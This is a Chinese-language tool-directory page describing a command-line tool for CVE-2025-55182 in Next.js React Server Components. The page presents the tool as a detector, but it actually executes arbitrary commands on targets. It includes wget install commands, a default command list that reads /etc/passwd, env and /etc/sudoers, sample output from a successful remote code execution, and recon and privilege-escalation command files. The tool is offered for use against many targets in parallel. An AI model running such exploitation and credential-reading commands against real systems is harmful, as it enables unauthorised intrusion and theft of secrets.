Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 用于检测使用 React Server Components 的 Next.js 应用程序中 CVE-2025-55182 和 CVE-2025-66478 的命令行工具。 | Kitploit
工具/GitHubGitHub/rix4uni/cve-2025-55182
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试命令与控制
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

用于检测使用 React Server Components 的 Next.js 应用程序中 CVE-2025-55182 和 CVE-2025-66478 的命令行工具。

查看仓库
613个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182

一个用于检测使用 React Server Components 的 Next.js 应用程序中 CVE-2025-55182 和 CVE-2025-66478 的命令行工具。

🚀 安装

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ 用法

CVE-2025-55182 扫描器

基本语法

root@kitploit:~
CVE-2025-55182 -d https://example.com

选项

选项描述默认值
-d, --domain目标 URL(若无协议则自动添加 https://)http://localhost:3000
-c, --command要执行的单条命令-
-m, --multiple用分号分隔的多条命令-
-f, --file包含命令的文件(每行一条)-
-h, --help显示帮助信息-

注意:如果未提供任何命令选项,将执行默认命令。

默认命令

该工具默认执行以下命令:

  1. cat /etc/os-release - 操作系统信息
  2. whoami - 当前用户
  3. pwd - 当前工作目录
  4. id - 用户 ID 和组
  5. uname -a - 系统信息
  6. hostname -I - 网络接口
  7. ls -la - 目录列表
  8. cat /etc/passwd - 用户账户
  9. env - 环境变量
  10. ps aux - 正在运行的进程

报告生成器

reportgenerator 工具会根据扫描结果自动生成专业的漏洞披露报告。

功能特点

  • 并行扫描多个目标
  • 自动编号,保留已有报告(不会覆盖)
  • 包含安全漏洞披露部分的专业 Markdown 报告
  • 可自定义研究人员姓名和输入文件

基本用法

root@kitploit:~
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Run report generator
reportgenerator

选项

标志描述默认值
--file包含目标域名的输入文件subs.txt
--user用于披露部分的研究人员姓名Bhagirath Saxena

示例

root@kitploit:~
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator

# Use custom target file
reportgenerator --file targets.txt

# Use custom researcher name
reportgenerator --user "John Doe"

# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"

输出结构

报告生成在两个目录中:

  • textfile/ - 原始扫描输出(编号:1.txt、2.txt 等)
  • mdfile/ - 专业 Markdown 报告(编号:1.md、2.md 等)

注意: 自动编号功能可确保已有报告永远不会被覆盖。新扫描会从现有最高编号继续。

报告格式

生成的每份报告包含:

  1. 安全漏洞披露 - 专业的介绍信
  2. 目标 - 被测域名
  3. 执行的命令 - 测试期间运行的命令列表
  4. 漏洞摘要 - CVE 详情和影响评估
  5. 利用详情 - 命令输出及执行状态
  6. 执行摘要 - 显示每条命令成功/失败情况的表格
  7. 影响分析 - 严重性评估和观察结果
  8. 修复建议 - 给安全团队的补救步骤
  9. 参考资料 - CVE 详情和安全公告的链接

🎨 输出示例

成功利用

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

部分成功

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 技术细节

漏洞

  • CVE: CVE-2025-55182
  • 类型: 原型污染 → RCE
  • 影响范围: 具有特定配置的 Next.js 应用程序
  • 攻击向量: 通过精心构造的 multipart/form-data 发送 HTTP POST 请求
  • 影响: 以应用程序用户身份进行未经认证的远程代码执行

📚 参考资料

  • CVE-2025-55182 详情
  • Next.js 安全公告

commands/ 目录示例:

为不同场景创建示例命令文件:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
下载工具